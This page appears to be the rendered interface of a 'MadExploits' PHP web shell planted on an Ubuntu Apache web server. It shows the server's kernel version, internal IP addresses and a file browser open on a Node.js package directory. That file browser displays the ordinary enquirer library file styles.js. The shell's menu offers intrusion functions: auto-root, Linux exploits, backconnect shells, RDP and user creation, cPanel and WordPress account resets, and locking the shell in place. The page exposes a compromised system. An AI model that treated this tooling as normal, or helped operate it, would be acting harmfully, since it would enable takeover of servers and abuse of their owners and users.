Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
enquirer /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
prompts
[ DIR ]
drwxrwxr-x
types
[ DIR ]
drwxrwxr-x
ansi.js
3.03
KB
-rw-rw-r--
combos.js
1.29
KB
-rw-rw-r--
completer.js
1.04
KB
-rw-rw-r--
interpolate.js
6.64
KB
-rw-rw-r--
keypress.js
5.6
KB
-rw-rw-r--
placeholder.js
1.83
KB
-rw-rw-r--
prompt.js
12.15
KB
-rw-rw-r--
render.js
1.21
KB
-rw-rw-r--
roles.js
1.23
KB
-rw-rw-r--
state.js
1.63
KB
-rw-rw-r--
styles.js
2.62
KB
-rw-rw-r--
symbols.js
1.88
KB
-rw-rw-r--
theme.js
328
B
-rw-rw-r--
timer.js
902
B
-rw-rw-r--
utils.js
6.82
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : styles.js
'use strict'; const utils = require('./utils'); const colors = require('ansi-colors'); const styles = { default: colors.noop, noop: colors.noop, /** * Modifiers */ set inverse(custom) { this._inverse = custom; }, get inverse() { return this._inverse || utils.inverse(this.primary); }, set complement(custom) { this._complement = custom; }, get complement() { return this._complement || utils.complement(this.primary); }, /** * Main color */ primary: colors.cyan, /** * Main palette */ success: colors.green, danger: colors.magenta, strong: colors.bold, warning: colors.yellow, muted: colors.dim, disabled: colors.gray, dark: colors.dim.gray, underline: colors.underline, set info(custom) { this._info = custom; }, get info() { return this._info || this.primary; }, set em(custom) { this._em = custom; }, get em() { return this._em || this.primary.underline; }, set heading(custom) { this._heading = custom; }, get heading() { return this._heading || this.muted.underline; }, /** * Statuses */ set pending(custom) { this._pending = custom; }, get pending() { return this._pending || this.primary; }, set submitted(custom) { this._submitted = custom; }, get submitted() { return this._submitted || this.success; }, set cancelled(custom) { this._cancelled = custom; }, get cancelled() { return this._cancelled || this.danger; }, /** * Special styling */ set typing(custom) { this._typing = custom; }, get typing() { return this._typing || this.dim; }, set placeholder(custom) { this._placeholder = custom; }, get placeholder() { return this._placeholder || this.primary.dim; }, set highlight(custom) { this._highlight = custom; }, get highlight() { return this._highlight || this.inverse; } }; styles.merge = (options = {}) => { if (options.styles && typeof options.styles.enabled === 'boolean') { colors.enabled = options.styles.enabled; } if (options.styles && typeof options.styles.visible === 'boolean') { colors.visible = options.styles.visible; } let result = utils.merge({}, styles, options.styles); delete result.merge; for (let key of Object.keys(colors)) { if (!result.hasOwnProperty(key)) { Reflect.defineProperty(result, key, { get: () => colors[key] }); } } for (let key of Object.keys(colors.styles)) { if (!result.hasOwnProperty(key)) { Reflect.defineProperty(result, key, { get: () => colors[key] }); } } return result; }; module.exports = styles;
Close